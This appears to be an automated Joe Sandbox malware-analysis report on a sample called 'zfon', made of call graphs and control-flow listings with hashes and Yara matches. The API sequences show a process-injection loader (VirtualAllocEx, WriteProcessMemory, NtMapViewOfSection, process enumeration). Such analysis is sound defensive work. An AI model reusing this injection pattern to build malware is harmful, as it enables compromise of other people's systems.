53702 2dc4be41580 RtlFreeHeap RtlFreeHeap __std_exception_copy _Maklocstr 53677->53702 53679 2dc4be416e4 53679->53677 53680 2dc4be41781 DuplicateHandle 53679->53680 53680->53677 53681 2dc4be41bf8 Concurrency::cancel_current_task 53681->53661 53682->53664 53683->53668 53684->53668 53685->53668 53686->53668 53687->53668 53688->53668 53690->53668 53693 2dc4be42090 _fread_nolock 53691->53693 53692 2dc4be420e2 NtQueryInformationProcess 53692->53693 53695 2dc4be4210d 53692->53695 53693->53692 53694 2dc4be42143 _Maklocstr ctype 53694->53679 53701 2dc4be42111 Concurrency::cancel_current_task 53695->53701 53703 2dc4be52a60 2 API calls 5 library calls 53695->53703 53699 2dc4be421ab 53704 2dc4be41510 RtlFreeHeap RtlFreeHeap __std_exception_copy _Maklocstr 53699->53704 53701->53694 53705 2dc4be9cb34 RtlFreeHeap _invalid_parameter_noinfo _invalid_parameter_noinfo_noreturn 53701->53705 53702->53681 53703->53699 53704->53701 53706 2dc4be54830 53707 2dc4be548aa 53706->53707 53729 2dc4be548ea 53707->53729 53761 2dc4be838a0 TlsFree RtlFreeHeap RtlFreeHeap std::_Facet_Register 53707->53761 53708 2dc4be5499f 53709 2dc4be549a9 VirtualAllocEx 53708->53709 53714 2dc4be54f02 53709->53714 53720 2dc4be549d5 53709->53720 53711 2dc4be548d0 53762 2dc4be86b20 RtlFreeHeap RtlFreeHeap 53711->53762 53791 2dc4be52a60 2 API calls 5 library calls 53714->53791 53717 2dc4be54f2f 53792 2dc4be41510 RtlFreeHeap RtlFreeHeap __std_exception_copy _Maklocstr 53717->53792 53719 2dc4be54bf4 53725 2dc4be54c35 WriteProcessMemory 53719->53725 53726 2dc4be54a28 ctype 53720->53726 53767 2dc4be838a0 TlsFree RtlFreeHeap RtlFreeHeap std::_Facet_Register 53720->53767 53721 2dc4be54f3d Concurrency::cancel_current_task 53724 2dc4be54a0e 53768 2dc4be86b20 RtlFreeHeap RtlFreeHeap 53724->53768 53732 2dc4be54c5f 53725->53732 53726->53719 53733 2dc4be54efd 53726->53733 53769 2dc4be48cb0 RtlFreeHeap RtlFreeHeap std::_Facet_Register 53726->53769 53770 2dc4be48d90 RtlFreeHeap RtlFreeHeap 53726->53770 53771 2dc4be7d670 RtlFreeHeap RtlFreeHeap std::_Facet_Register 53726->53771 53772 2dc4be4ad40 RtlFreeHeap RtlFreeHeap 53726->53772 53773 2dc4be559d0 RtlFreeHeap RtlFreeHeap Concurrency::cancel_current_task ctype _invalid_parameter_noinfo_noreturn 53726->53773 53774 2dc4be86b40 2 API calls 4 library calls 53726->53774 53775 2dc4be7def0 RtlFreeHeap RtlFreeHeap 53726->53775 53776 2dc4be455e0 RtlFreeHeap ctype _invalid_parameter_noinfo_noreturn 53726->53776 53729->53708 53763 2dc4be7d670 RtlFreeHeap RtlFreeHeap std::_Facet_Register 53729->53763 53764 2dc4be46750 RtlFreeHeap RtlFreeHeap 53729->53764 53765 2dc4be86b40 2 API calls 4 library calls 53729->53765 53766 2dc4be7def0 RtlFreeHeap RtlFreeHeap 53729->53766 53749 2dc4be54cab 53732->53749 53777 2dc4be838a0 TlsFree RtlFreeHeap RtlFreeHeap std::_Facet_Register 53732->53777 53790 2dc4be9cb34 RtlFreeHeap _invalid_parameter_noinfo _invalid_parameter_noinfo_noreturn 53733->53790 53737 2dc4be54c91 53778 2dc4be86b20 RtlFreeHeap RtlFreeHeap 53737->53778 53740 2dc4be54d60 53783 2dc4be53900 2 API calls 4 library calls 53740->53783 53749->53740 53779 2dc4be7d670 RtlFreeHeap RtlFreeHeap std::_Facet_Register 53749->53779 53780 2dc4be46750 RtlFreeHeap RtlFreeHeap 53749->53780 53781 2dc4be86b40 2 API calls 4 library calls 53749->53781 53782 2dc4be7def0 RtlFreeHeap RtlFreeHeap 53749->53782 53750 2dc4be54dc4 53759 2dc4be54e10 53750->53759 53784 2dc4be838a0 TlsFree RtlFreeHeap RtlFreeHeap std::_Facet_Register 53750->53784 53753 2dc4be54df6 53785 2dc4be86b20 RtlFreeHeap RtlFreeHeap 53753->53785 53755 2dc4be54ec0 _Maklocstr 53759->53755 53786 2dc4be7d670 RtlFreeHeap RtlFreeHeap std::_Facet_Register 53759->53786 53787 2dc4be46750 RtlFreeHeap RtlFreeHeap 53759->53787 53788 2dc4be86b40 2 API calls 4 library calls 53759->53788 53789 2dc4be7def0 RtlFreeHeap RtlFreeHeap 53759->53789 53761->53711 53762->53729 53763->53729 53764->53729 53765->53729 53767->53724 53768->53726 53769->53726 53771->53726 53772->53726 53773->53726 53774->53726 53776->53726 53777->53737 53778->53749 53779->53749 53780->53749 53781->53749 53783->53750 53784->53753 53785->53759 53786->53759 53787->53759 53788->53759 53791->53717 53792->53721 53793 2dc4be547f0 53796 2dc4be546b0 53793->53796 53795 2dc4be54804 ctype 53797 2dc4be546d0 53796->53797 53799 2dc4be546f0 53796->53799 53798 2dc4be546dc CloseHandle 53797->53798 53797->53799 53798->53799 53799->53795 53800 2dc4beae554 53803 2dc4beae563 std::_Facet_Register _Getctype 53800->53803 53802 2dc4beae59d 53803->53802 53804 2dc4bea07ac RtlFreeHeap _get_daylight 53803->53804 53804->53802 53805 2dc4beae518 53806 2dc4beae51d RtlFreeHeap 53805->53806 53807 2dc4beae538 __free_lconv_num _get_daylight 53805->53807 53806->53807 53808 7ff7f97a3c68 53811 7ff7f9816ef9 53808->53811 53812 7ff7f9816ff9 53811->53812 53813 7ff7f9816f2b 53811->53813 53823 7ff7f98182c7 53812->53823 53846 7ff7f9819d6f 53813->53846 53817 7ff7f9819d6f LoadLibraryA 53818 7ff7f9816f73 53817->53818 53819 7ff7f9819d6f LoadLibraryA 53818->53819 53820 7ff7f9816f89 53819->53820 53821 7ff7f9819d6f LoadLibraryA 53820->53821 53822 7ff7f97a3c6d 53821->53822 53824 7ff7f9819d6f LoadLibraryA 53823->53824 53825 7ff7f98182f0 53824->53825 53826 7ff7f9819d6f LoadLibraryA 53825->53826 53827 7ff7f9818303 53826->53827 53828 7ff7f9819d6f LoadLibraryA 53827->53828 53829 7ff7f9818319 53828->53829 53830 7ff7f981832b VirtualAlloc 53829->53830 53845 7ff7f9818344 53829->53845 53831 7ff7f9818370 53830->53831 53830->53845 53832 7ff7f9819d6f LoadLibraryA 53831->53832 53831->53845 53834 7ff7f98183e4 53832->53834 53833 7ff7f981843b 53835 7ff7f9819d6f LoadLibraryA 53833->53835 53836 7ff7f981847b 53833->53836 53833->53845 53834->53833 53834->53845 53873 7ff7f9819adf 53834->53873 53835->53833 53838 7ff7f98184f2 53836->53838 53836->53845 53877 7ff7f981722f LoadLibraryA 53836->53877 53839 7ff7f981850d VirtualAlloc 53838->53839 53844 7ff7f981853c 53838->53844 53838->53845 53839->53844 53839->53845 53841 7ff7f98184d9 53841->53845 53878 7ff7f981735b LoadLibraryA 53841->53878 53844->53845 53850 7ff7f9818ad3 53844->53850 53845->53822 53847 7ff7f9819da6 53846->53847 53848 7ff7f9816f3b 53847->53848 53882 7ff7f981787b LoadLibraryA 53847->53882 53848->53817 53848->53822 53851 7ff7f9818b27 53850->53851 53852 7ff7f9818b7f NtCreateSection 53851->53852 53854 7ff7f9818bae 53851->53854 53872 7ff7f981935b 53851->53872 53852->53854 53852->53872 53853 7ff7f9818c54 NtMapViewOfSection 53859 7ff7f9818ca8 53853->53859 53854->53853 53854->53872 53855 7ff7f9819023 VirtualAlloc 53861 7ff7f98190da 53855->53861 53856 7ff7f9819adf LoadLibraryA 53856->53859 53858 7ff7f9819adf LoadLibraryA 53860 7ff7f9818f84 53858->53860 53859->53856 53859->53860 53859->53872 53879 7ff7f9819bc7 LoadLibraryA 53859->53879 53860->53855 53860->53858 53880 7ff7f9819bc7 LoadLibraryA 53860->53880 53862 7ff7f98191d6 VirtualProtect 53861->53862 53864 7ff7f9819152 NtUnmapViewOfSection 53861->53864 53867 7ff7f98191fe 53862->53867 53870 7ff7f98192dc 53862->53870 53865 7ff7f981916a NtMapViewOfSection 53864->53865 53864->53872 53865->53862 53865->53872 53869 7ff7f98192af VirtualProtect 53867->53869 53867->53870 53869->53867 53870->53872 53881 7ff7f9819883 LoadLibraryA 53870->53881 53872->53845 53876 7ff7f9819afd 53873->53876 53874 7ff7f9819ba8 LoadLibraryA 53875 7ff7f9819bb0 53874->53875 53875->53834 53876->53874 53876->53875 53877->53841 53878->53838 53879->53859 53880->53860 53881->53872 53882->53847 53883 2dc4be87be0 53884 2dc4be87bef 53883->53884 53885 2dc4be87bf6 53884->53885 53888 2dc4be811b0 53884->53888 53887 2dc4be87c1c TlsFree 53889 2dc4be811d5 std::bad_exception::bad_exception 53888->53889 53894 2dc4be7e480 RtlFreeHeap RtlFreeHeap __std_exception_copy 53889->53894 53891 2dc4be81225 53895 2dc4be7e710 2 API calls 4 library calls 53891->53895 53893 2dc4be81262 53894->53891 53895->53893 53896 2dc4be41835 CloseHandle 53897 2dc4be41851 53896->53897 53914 2dc4be421e0 2 API calls 5 library calls 53897->53914 53899 2dc4be418b7 ctype 53901 2dc4be41969 ctype 53899->53901 53915 2dc4be9cb34 RtlFreeHeap _invalid_parameter_noinfo _invalid_parameter_noinfo_noreturn 53899->53915 53903 2dc4be41a07 ctype 53901->53903 53916 2dc4be9cb34 RtlFreeHeap _invalid_parameter_noinfo _invalid_parameter_noinfo_noreturn 53901->53916 53904 2dc4be41a10 53903->53904 53906 2dc4be41a52 ctype 53903->53906 53917 2dc4be9cb34 RtlFreeHeap _invalid_parameter_noinfo _invalid_parameter_noinfo_noreturn 53903->53917 53908 2dc4be41aab ctype 53906->53908 53918 2dc4be9cb34 RtlFreeHeap _invalid_parameter_noinfo _invalid_parameter_noinfo_noreturn 53906->53918 53911 2dc4be41afb _Maklocstr ctype 53908->53911 53919 2dc4be9cb34 RtlFreeHeap _invalid_parameter_noinfo _invalid_parameter_noinfo_noreturn 53908->53919 53914->53899
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000006.00000002.2606324920.00007FF7F96E1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F96E0000, based on PE: true
                                                                                                • Associated: 00000006.00000002.2606008536.00007FF7F96E0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000006.00000002.2606835994.00007FF7F981B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000006.00000002.2606835994.00007FF7F98D5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000006.00000002.2607973026.00007FF7F9941000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000006.00000002.2608127384.00007FF7F9942000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000006.00000002.2608223601.00007FF7F9953000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000006.00000002.2608300064.00007FF7F9955000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000006.00000002.2608364168.00007FF7F9969000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_6_2_7ff7f96e0000_zfon.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Section$ViewVirtual$Protect$AllocCreateUnmap
                                                                                                • String ID: @
                                                                                                • API String ID: 814226357-2766056989
                                                                                                • Opcode ID: 537dcba744a9e5ab819796c1abf8ff142b8021ff1599a3d2e9f8c20dbb037682
                                                                                                • Instruction ID: 28b16e948e1d79fc0bc33cee952a52bcf7c8114267e3dcb8e24a56d3f6839862
                                                                                                • Opcode Fuzzy Hash: 537dcba744a9e5ab819796c1abf8ff142b8021ff1599a3d2e9f8c20dbb037682
                                                                                                • Instruction Fuzzy Hash: AF62DD32A14A81C7EB64DF25E8406AEB3B5FB48BA8F804135DB5D47B88DF39E590C750

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 272 2dc4be54830-2dc4be548b8 call 2dc4be82960 call 2dc4be86900 277 2dc4be548fd-2dc4be54901 272->277 278 2dc4be548ba-2dc4be548fb call 2dc4be838a0 call 2dc4be86b20 272->278 279 2dc4be54907-2dc4be5490a 277->279 278->279 281 2dc4be54910-2dc4be54957 call 2dc4be82960 call 2dc4be7d670 call 2dc4be56520 call 2dc4be46750 279->281 282 2dc4be5499f-2dc4be549a2 279->282 316 2dc4be5498f-2dc4be54999 281->316 317 2dc4be54959-2dc4be54968 call 2dc4be56520 281->317 283 2dc4be549a9-2dc4be549cf VirtualAllocEx 282->283 284 2dc4be549a4 call 2dc4be86650 282->284 288 2dc4be54f03-2dc4be54f55 call 2dc4be41ed0 call 2dc4be52a60 call 2dc4be41510 call 2dc4be90a14 283->288 289 2dc4be549d5-2dc4be549f6 call 2dc4be82960 call 2dc4be86900 283->289 284->283 308 2dc4be549f8-2dc4be54a39 call 2dc4be838a0 call 2dc4be86b20 289->308 309 2dc4be54a3b-2dc4be54a3f 289->309 311 2dc4be54a45-2dc4be54a48 308->311 309->311 314 2dc4be54a4e-2dc4be54a5c 311->314 315 2dc4be54bf4-2dc4be54bf7 311->315 320 2dc4be54a60-2dc4be54b00 call 2dc4be48cb0 call 2dc4be424c0 call 2dc4be48d90 314->320 322 2dc4be54bfe-2dc4be54c5a call 2dc4be424c0 WriteProcessMemory call 2dc4be53a50 315->322 323 2dc4be54bf9 call 2dc4be86650 315->323 316->281 316->282 334 2dc4be5496a-2dc4be54986 call 2dc4be46a60 call 2dc4be86b40 317->334 335 2dc4be54987-2dc4be5498a call 2dc4be7def0 317->335 353 2dc4be54b02-2dc4be54b14 320->353 354 2dc4be54b35-2dc4be54ba1 call 2dc4be82960 call 2dc4be7d670 call 2dc4be56520 call 2dc4be4ad40 call 2dc4be559d0 320->354 342 2dc4be54c5f-2dc4be54c79 call 2dc4be82960 call 2dc4be86900 322->342 323->322 334->335 335->316 361 2dc4be54cbe-2dc4be54cc2 342->361 362 2dc4be54c7b-2dc4be54cbc call 2dc4be838a0 call 2dc4be86b20 342->362 357 2dc4be54b2f-2dc4be54b34 call 2dc4be7beec 353->357 358 2dc4be54b16-2dc4be54b29 353->358 398 2dc4be54ba3-2dc4be54bb2 call 2dc4be56520 354->398 399 2dc4be54bda-2dc4be54bee call 2dc4be455e0 354->399 357->354 358->357 363 2dc4be54efd-2dc4be54f02 call 2dc4be9cb34 358->363 365 2dc4be54cc8-2dc4be54ccb 361->365 362->365 363->288 368 2dc4be54cd1-2dc4be54d18 call 2dc4be82960 call 2dc4be7d670 call 2dc4be56520 call 2dc4be46750 365->368 369 2dc4be54d60-2dc4be54d63 365->369 407 2dc4be54d50-2dc4be54d5a 368->407 408 2dc4be54d1a-2dc4be54d29 call 2dc4be56520 368->408 374 2dc4be54d6a-2dc4be54dde call 2dc4be424c0 call 2dc4be53900 call 2dc4be82960 call 2dc4be86900 369->374 375 2dc4be54d65 call 2dc4be86650 369->375 419 2dc4be54de0-2dc4be54e21 call 2dc4be838a0 call 2dc4be86b20 374->419 420 2dc4be54e23-2dc4be54e24 374->420 375->374 410 2dc4be54bd1-2dc4be54bd9 call 2dc4be7def0 398->410 411 2dc4be54bb4-2dc4be54bd0 call 2dc4be46a60 call 2dc4be86b40 398->411 399->315 399->320 407->368 407->369 422 2dc4be54d48-2dc4be54d4b call 2dc4be7def0 408->422 423 2dc4be54d2b-2dc4be54d47 call 2dc4be46a60 call 2dc4be86b40 408->423 410->399 411->410 426 2dc4be54e2a-2dc4be54e2d 419->426 420->426 422->407 423->422 431 2dc4be54ec0-2dc4be54ec3 426->431 432 2dc4be54e33-2dc4be54e79 call 2dc4be82960 call 2dc4be7d670 call 2dc4be56520 call 2dc4be46750 426->432 435 2dc4be54ecd-2dc4be54efc call 2dc4be7be90 431->435 436 2dc4be54ec5-2dc4be54ec8 call 2dc4be86650 431->436 453 2dc4be54eb0-2dc4be54eba 432->453 454 2dc4be54e7b-2dc4be54e89 call 2dc4be56520 432->454 436->435 453->431 453->432 457 2dc4be54ea8-2dc4be54eab call 2dc4be7def0 454->457 458 2dc4be54e8b-2dc4be54ea7 call 2dc4be46a60 call 2dc4be86b40 454->458 457->453 458->457
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000006.00000002.2604169993.000002DC4BE41000.00000020.10000000.00040000.00000000.sdmp, Offset: 000002DC4BE41000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_6_2_2dc4be41000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: AllocMemoryProcessVirtualWrite_invalid_parameter_noinfo_noreturn
                                                                                                • String ID:
                                                                                                • API String ID: 2518834501-0
                                                                                                • Opcode ID: 3929f3d7caecdf5a166518e108926a526826c599736ea3d0cce582099cd9f6e0
                                                                                                • Instruction ID: c98c814a20aa542ab351b587ffa1179137c7f71353b7f1e7b1708247f6756664
                                                                                                • Opcode Fuzzy Hash: 3929f3d7caecdf5a166518e108926a526826c599736ea3d0cce582099cd9f6e0
                                                                                                • Instruction Fuzzy Hash: B1227034514A4E8FEB95EF68C4A97EAB3E2FB98300F50465AE44EC3192DF749D80C742

                                                                                                Control-flow Graph

                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000006.00000002.2604169993.000002DC4BE41000.00000020.10000000.00040000.00000000.sdmp, Offset: 000002DC4BE41000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_6_2_2dc4be41000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: CloseCreateFirstHandleProcess32SnapshotToolhelp32_invalid_parameter_noinfo
                                                                                                • String ID:
                                                                                                • API String ID: 3417858151-0
                                                                                                • Opcode ID: 58fc19107ec0e66d273cc40dc8bc3f342268e8061c34a6a0b169b5af377fc60a
                                                                                                • Instruction ID: 9bdf5e2f6eec8967736945abf0ac61dd4cbc761a384dad1a0b8031a7360dc7d7
                                                                                                • Opcode Fuzzy Hash: 58fc19107ec0e66d273cc40dc8bc3f342268e8061c34a6a0b169b5af377fc60a
                                                                                                • Instruction Fuzzy Hash: 66415374508B598FE794EF28D49875AB7E2FB98310F5046AAE40DC7296DB34CC44CB82

                                                                                                Control-flow Graph

                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000006.00000002.2604169993.000002DC4BE41000.00000020.10000000.00040000.00000000.sdmp, Offset: 000002DC4BE41000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_6_2_2dc4be41000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: InformationProcessQuery__std_exception_copy_invalid_parameter_noinfo_noreturn
                                                                                                • String ID:
                                                                                                • API String ID: 2261429478-0
                                                                                                • Opcode ID: c26532dd56cd671d0a1b3ad32ebf9ddf33ffb71fd6066d7300b13c4462bb992f
                                                                                                • Instruction ID: 53d281e224da8aba560b543999a597d32f44e1eb2c70ff81d9289342420a55c2
                                                                                                • Opcode Fuzzy Hash: c26532dd56cd671d0a1b3ad32ebf9ddf33ffb71fd6066d7300b13c4462bb992f
                                                                                                • Instruction Fuzzy Hash: E3517930624E494FDB58EF2CD499B6AB7D2FB95310F60461FE04AC3296DA71AC85C783

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 540 7ff7f98182c7-7ff7f981831f call 7ff7f9819d6f * 3 547 7ff7f9818351 540->547 548 7ff7f9818321-7ff7f9818324 540->548 549 7ff7f9818354-7ff7f981836f 547->549 548->547 550 7ff7f9818326-7ff7f9818329 548->550 550->547 551 7ff7f981832b-7ff7f9818342 VirtualAlloc 550->551 552 7ff7f9818370-7ff7f9818399 call 7ff7f981a2ef call 7ff7f981a30f 551->552 553 7ff7f9818344-7ff7f981834b 551->553 559 7ff7f981839b-7ff7f98183cf call 7ff7f9819f23 call 7ff7f9819de3 552->559 560 7ff7f98183d5-7ff7f98183eb call 7ff7f9819d6f 552->560 553->547 555 7ff7f981834d 553->555 555->547 559->560 571 7ff7f981862a 559->571 560->547 566 7ff7f98183f1 560->566 567 7ff7f98183f8-7ff7f98183fe 566->567 569 7ff7f981843b-7ff7f9818446 567->569 570 7ff7f9818400 567->570 574 7ff7f9818448-7ff7f9818462 call 7ff7f9819d6f 569->574 575 7ff7f981847b-7ff7f9818484 569->575 573 7ff7f9818402-7ff7f9818404 570->573 572 7ff7f9818630-7ff7f9818641 571->572 578 7ff7f9818674-7ff7f9818695 call 7ff7f981a30f 572->578 579 7ff7f9818643-7ff7f981864d 572->579 580 7ff7f981841d-7ff7f981841f 573->580 581 7ff7f9818406-7ff7f981840c 573->581 596 7ff7f9818471-7ff7f9818479 574->596 597 7ff7f9818464-7ff7f981846b 574->597 576 7ff7f9818486-7ff7f9818496 call 7ff7f98173eb 575->576 577 7ff7f98184a5-7ff7f98184ae 575->577 576->572 598 7ff7f981849c-7ff7f98184a3 576->598 577->572 586 7ff7f98184b4-7ff7f98184be 577->586 610 7ff7f9818697 578->610 611 7ff7f981869b-7ff7f981869d 578->611 579->578 584 7ff7f981864f-7ff7f981866c call 7ff7f981a30f 579->584 580->569 587 7ff7f9818421-7ff7f9818439 call 7ff7f9819adf 580->587 581->580 585 7ff7f981840e-7ff7f981841b 581->585 584->578 585->573 585->580 592 7ff7f98184c8-7ff7f98184cf 586->592 593 7ff7f98184c0 586->593 587->567 600 7ff7f98184d1-7ff7f98184db call 7ff7f981722f 592->600 601 7ff7f9818503-7ff7f9818507 592->601 593->592 596->574 596->575 597->571 597->596 598->592 615 7ff7f98184ea-7ff7f98184f4 call 7ff7f981735b 600->615 616 7ff7f98184dd-7ff7f98184e4 600->616 603 7ff7f98185ba-7ff7f98185c2 601->603 604 7ff7f981850d-7ff7f9818536 VirtualAlloc 601->604 612 7ff7f9818614-7ff7f981861a call 7ff7f9818ad3 603->612 613 7ff7f98185c4-7ff7f98185ca 603->613 604->572 607 7ff7f981853c-7ff7f9818556 call 7ff7f981a2ef 604->607 626 7ff7f9818558-7ff7f981855b 607->626 627 7ff7f9818572-7ff7f98185b5 607->627 610->611 611->549 620 7ff7f981861f-7ff7f9818626 612->620 618 7ff7f98185cc-7ff7f98185d2 613->618 619 7ff7f98185e1-7ff7f98185f3 call 7ff7f9818053 613->619 615->601 635 7ff7f98184f6-7ff7f98184fd 615->635 616->572 616->615 618->620 621 7ff7f98185d4-7ff7f98185df call 7ff7f9819587 618->621 633 7ff7f9818605-7ff7f9818612 call 7ff7f9817ae3 619->633 634 7ff7f98185f5-7ff7f9818600 call 7ff7f98186a3 619->634 620->572 629 7ff7f9818628 620->629 621->620 626->603 632 7ff7f981855d-7ff7f9818570 call 7ff7f981a073 626->632 627->572 642 7ff7f98185b7 627->642 629->629 632->642 633->620 634->633 635->572 635->601 642->603
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000006.00000002.2606324920.00007FF7F96E1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F96E0000, based on PE: true
                                                                                                • Associated: 00000006.00000002.2606008536.00007FF7F96E0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000006.00000002.2606835994.00007FF7F981B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000006.00000002.2606835994.00007FF7F98D5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000006.00000002.2607973026.00007FF7F9941000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000006.00000002.2608127384.00007FF7F9942000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000006.00000002.2608223601.00007FF7F9953000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000006.00000002.2608300064.00007FF7F9955000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000006.00000002.2608364168.00007FF7F9969000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_6_2_7ff7f96e0000_zfon.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: AllocVirtual
                                                                                                • String ID:
                                                                                                • API String ID: 4275171209-0
                                                                                                • Opcode ID: 5d17924f1650dce35aa6cfa67234e302229330514130ed1fd0e34ce5b20ef98f
                                                                                                • Instruction ID: 3b5bb721b5dcca3fad783427ff3c65d7826403b61e1627fbf4fabd92c5b05cc8
                                                                                                • Opcode Fuzzy Hash: 5d17924f1650dce35aa6cfa67234e302229330514130ed1fd0e34ce5b20ef98f
                                                                                                • Instruction Fuzzy Hash: 71B1B521B28542C2EB6CEE21D9456BDA3B1FB44BA4F844135DE2D476C9DF3CE4A1C7A0

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 183 2dc4be41835-2dc4be4184f CloseHandle 184 2dc4be41851-2dc4be41855 183->184 185 2dc4be4185a-2dc4be418c5 call 2dc4be424c0 call 2dc4be421e0 183->185 184->185 190 2dc4be41932-2dc4be4193a 185->190 191 2dc4be418c7-2dc4be418ca 185->191 194 2dc4be4193c-2dc4be4194e 190->194 195 2dc4be4196e-2dc4be41987 call 2dc4be41d30 190->195 192 2dc4be418cc-2dc4be418e1 191->192 193 2dc4be41904-2dc4be4192f 191->193 196 2dc4be418e3-2dc4be418f6 192->196 197 2dc4be418fc-2dc4be418ff call 2dc4be7beec 192->197 193->190 198 2dc4be41950-2dc4be41963 194->198 199 2dc4be41969 call 2dc4be7beec 194->199 206 2dc4be4198c-2dc4be41994 195->206 207 2dc4be41989-2dc4be4198a 195->207 196->197 201 2dc4be41bc6-2dc4be41bcb call 2dc4be9cb34 196->201 197->193 198->199 198->201 199->195 213 2dc4be41bcc-2dc4be41bd1 call 2dc4be9cb34 201->213 208 2dc4be41999-2dc4be419a1 206->208 209 2dc4be41996-2dc4be41997 206->209 207->206 211 2dc4be419c2 208->211 212 2dc4be419a3-2dc4be419a6 208->212 209->208 216 2dc4be419c4-2dc4be419d0 211->216 214 2dc4be419be-2dc4be419c0 212->214 215 2dc4be419a8-2dc4be419ae 212->215 222 2dc4be41bd2-2dc4be41bd7 call 2dc4be9cb34 213->222 214->216 215->211 218 2dc4be419b0-2dc4be419bc 215->218 219 2dc4be419d2-2dc4be419ec 216->219 220 2dc4be41a0c-2dc4be41a0e 216->220 218->214 218->215 223 2dc4be419ee-2dc4be41a01 219->223 224 2dc4be41a07 call 2dc4be7beec 219->224 225 2dc4be41a10-2dc4be41b9e 220->225 226 2dc4be41a22-2dc4be41a37 220->226 235 2dc4be41bd8-2dc4be41bdd call 2dc4be9cb34 222->235 223->213 223->224 224->220 230 2dc4be41a52-2dc4be41a79 call 2dc4be7beec 226->230 231 2dc4be41a39-2dc4be41a4c 226->231 236 2dc4be41a7b-2dc4be41a90 230->236 237 2dc4be41ac4-2dc4be41acc 230->237 231->222 231->230 245 2dc4be41bde-2dc4be41c1d call 2dc4be9cb34 call 2dc4be41580 call 2dc4be90a14 235->245 239 2dc4be41a92-2dc4be41aa5 236->239 240 2dc4be41aab-2dc4be41abd call 2dc4be7beec 236->240 242 2dc4be41b03-2dc4be41b22 237->242 243 2dc4be41ace-2dc4be41ae0 237->243 239->235 239->240 240->237 248 2dc4be41b4e-2dc4be41bc5 call 2dc4be7be90 242->248 249 2dc4be41b24-2dc4be41b2f 242->249 246 2dc4be41ae2-2dc4be41af5 243->246 247 2dc4be41afe call 2dc4be7beec 243->247 266 2dc4be41c1f-2dc4be41c33 245->266 267 2dc4be41c55-2dc4be41c5a 245->267 246->245 254 2dc4be41afb-2dc4be41afc 246->254 247->242 249->248 250 2dc4be41b31-2dc4be41b43 249->250 250->248 261 2dc4be41b45-2dc4be41b49 250->261 254->247 261->248 268 2dc4be41c50-2dc4be41c51 266->268 269 2dc4be41c35-2dc4be41c45 266->269 268->267 269->268 271 2dc4be41c47-2dc4be41c4b 269->271 271->268
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000006.00000002.2604169993.000002DC4BE41000.00000020.10000000.00040000.00000000.sdmp, Offset: 000002DC4BE41000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_6_2_2dc4be41000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: _invalid_parameter_noinfo_noreturn$CloseHandle
                                                                                                • String ID:
                                                                                                • API String ID: 4069755476-0
                                                                                                • Opcode ID: 52794ae43ef133f375a4d7fa53b1f961356637d67dbba59633ce44484efc1cfd
                                                                                                • Instruction ID: aa72cd42bc3cbba31a93ca252c4261053a2febf6a4f14548ccbedda04c6865e5
                                                                                                • Opcode Fuzzy Hash: 52794ae43ef133f375a4d7fa53b1f961356637d67dbba59633ce44484efc1cfd
                                                                                                • Instruction Fuzzy Hash: 18C1DB34618E1E8FDF64EF28C498B9AB7D2FBD8310F644A0AD04AC7295DA75DC85C742

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
